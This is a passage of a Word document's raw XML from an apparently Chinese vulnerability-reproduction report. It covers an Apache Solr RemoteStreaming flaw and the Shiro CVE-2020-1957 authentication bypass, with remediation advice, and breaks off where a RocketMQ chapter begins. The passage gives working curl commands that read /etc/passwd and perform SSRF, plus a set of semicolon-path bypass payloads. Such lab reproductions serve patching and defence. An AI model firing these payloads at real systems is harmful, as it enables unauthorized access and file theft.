          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -H </w:t>
      </w:r>
      <w:r w:rsidR="00204F01">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Content-Type: application/json" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  --data-binary '{"set-property": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requestDispatcher.requestParsers.enableRemoteStreaming</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>": true}}' \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.1.100:8983/solr/demo/config"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1607E8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>返回HTTP 200且响应中包含"WARNING: This response format is experimental"即表示配置修改成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3A1531" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤三：任意文件读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354BBE56" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>通过debug/dump接口配合stream.url参数，使用file://协议读取/etc/passwd：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1B24C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-i -s -k \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.1.100:8983/solr/demo/debug/dump?param=ContentStreams&amp;stream.url=file:///etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1EB45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响应体中将包含/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/passwd的文件内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B91DA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步骤四：SSRF利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27374598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将stream.url指向内网服务，即可让</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器代为发起请求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E759331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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s -k \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.1.100:8983/solr/demo/debug/dump?param=ContentStreams&amp;stream.url=http://127.0.0.1:8080/internal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9C7067" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9102B3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache Solr 8.8.2及以上版本，官方在该版本中对Config API的set-property操作增加了安全限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39215A5B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 为Solr启用身份认证（如Basic Auth、Kerberos），禁止未授权访问Config API。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9419EB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>③ 在solrconfig.xml中显式设置enableRemoteStreaming="false"，并通过网络ACL限制8983端口的访问来源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB3236F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>④ 若业务不需要RemoteStreaming功能，可在防火墙层面阻断Solr服务器的出站连接，降低SSRF危害。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16635C14" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD01D64" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第二章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Apache Shiro </w:t>
      </w:r>
      <w:r>
        <w:t>认证绕过漏洞（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2020-1957</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57047306" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD8405" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Shiro是一款功能强大且易用的Java安全框架，提供身份验证、授权、密码学和会话管理等功能，广泛应用于Spring Boot等Java Web应用中。在Shiro 1.5.2及以前版本中，当应用使用Spring动态控制器（Dynamic Controller）时，攻击者可通过构造包含分号";"的特殊URL路径，绕过Shiro对目录的权限校验，直接访问受保护的管理页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617EA1A9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CB52C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Shiro &lt; 1.5.2（需配合Spring MVC动态控制器使用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8F3E96" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E60E605" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）Shiro的路径匹配机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56652C60" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Shiro通过PathMatchingFilterChainResolver类将请求URL与配置的过滤器链进行匹配。其核心匹配逻辑位于AntPathMatcher.doMatch()方法中。该方法将配置的路径模式（如/admin/**）和请求路径分别以"/"为分隔符切分为字符串数组，然后逐段进行匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0264418F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AntPathMatcher.doMatch() 核心逻辑（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>String[] pattDirs = tokenizeToStringArray(pattern, "/");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>String[] pathDirs = tokenizeToStringArray(path, "/");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int pattIdxStart = 0, pathIdxStart = 0;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>while (pattIdxStart &lt; pattDirs.length &amp;&amp; pathIdxStart &lt; pathDirs.length) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    String pattDir = pattDirs[pattIdxStart];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if ("**".equals(pattDir)) break;  // 遇到**通配符跳出循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (!patternMatchStrings(pattDir, pathDirs[pathIdxStart])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return false;  // 不匹配直接返回false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 xml:space="preserve">    pattIdxStart++; pathIdxStart++;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B33C6E4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>关键问题在于：Shiro在获取请求路径时，调用的是WebUtils.getPathWithinApplication()方法，该方法返回的是原始的servletPath，不会对分号";"做特殊处理。因此，当请求路径为/xxx/..;/admin/时，Shiro按"/"分割后得到的段包括"xxx"、"..;"、"admin"，其中"..;"与配置中的"**"或具体路径段均不匹配，导致Shiro认为该请求不命中/admin/**的过滤器链，从而放行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C61FEA8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）Spring的路径规范化机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06735E1C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>与Shiro不同，Spring MVC在处理请求时，会调用removeSemicolonContentInternal()方法对URL路径进行规范化。该方法会移除分号";"及其后面的内容（即矩阵变量Matrix Variables部分）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EDFB04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lastRenderedPageBreak/>
        <w:t>// Spring UrlPathHelper.removeSemicolonContentInternal() 简化示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>private String removeSemicolonContentInternal(String path) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    int semicolonIndex = path.indexOf(';');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    while (semicolonIndex != -1) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        int slashIndex = path.indexOf('/', semicolonIndex);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        if (slashIndex == -1) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            path = path.substring(0, semicolonIndex);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            break;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            path = path.substring(0, semicolonIndex) + path.substring(slashIndex);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        semicolonIndex = path.indexOf(';', semicolonIndex);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 xml:space="preserve">    return path;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC38DB0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>因此，当请求路径为/xxx/..;/admin/时，Spring会先移除";"后的内容，得到/xxx/../admin/，再经过路径规范化（解析..）后变为/admin/，最终命中/admin/**对应的控制器方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1F6C7C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（3）漏洞根因：双框架路径处理不一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339198D4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>该漏洞的本质是Shiro与Spring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> MVC两个框架对URL路径的处理逻辑存在差异：Shiro看到的是原始路径/xxx</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;/admin/，判定不匹配受保护路径，予以放行；Spring看到的是规范化后的路径/admin/，正常路由到管理页面控制器。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击者正是利用了这种"Shiro放行、Spring执行"的不一致性，实现了认证绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A0D74D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C70A073" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Vulhub Shiro CVE-2020-1957环境（Spring Boot + Shiro 1.5.1），监听端口8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C8692C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装curl、Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E77672C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2.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BDC094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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：验证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正常访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被拦截</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B91AD14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直接访问管理页面，确认会被重定向到登录页：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA9C4C3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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> "http://192.168.1.100:8080</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/admin/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE4747" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>返回HTTP 302，Location头指向/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>login.html;jsessionid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=xxx，说明认证拦截生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3151D9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤二：构造绕过Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181DD09E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>构造包含分号的恶意路径，绕过Shiro权限校验：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD90EB2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-i "http://192.168.1.100:8080/xxx/..;/admin/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04159F94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lastRenderedPageBreak/>
        <w:t>返回HTTP 200，响应体中包含管理页面内容，说明认证已被成功绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97AD3B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步骤三：其他变体Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDA0AC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>除/xxx/.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.;/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>admin/外，以下路径同样可实现绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E69EA6E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/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>;/admin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/admin/;/admin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/.;/admin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/admin%20/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20537938" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E2B77" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache Shiro 1.5.3及以上版本。官方在1.5.3中修改了getPathWithinApplication()方法，在获取路径后先进行URL解码和规范化处理，消除了与Spring的路径处理差异。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B65111" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 在Shiro配置中使用更严格的路径匹配规则，避免仅依赖目录级别的通配符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D50D50A" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ 在Web服务器（如Nginx）层面配置URL规范化，统一路径格式后再转发给后端应用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109AEA2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5B7D5A10" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第三章</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  Apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RocketMQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>远程命令执行漏洞（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2023-33246</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4F026" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
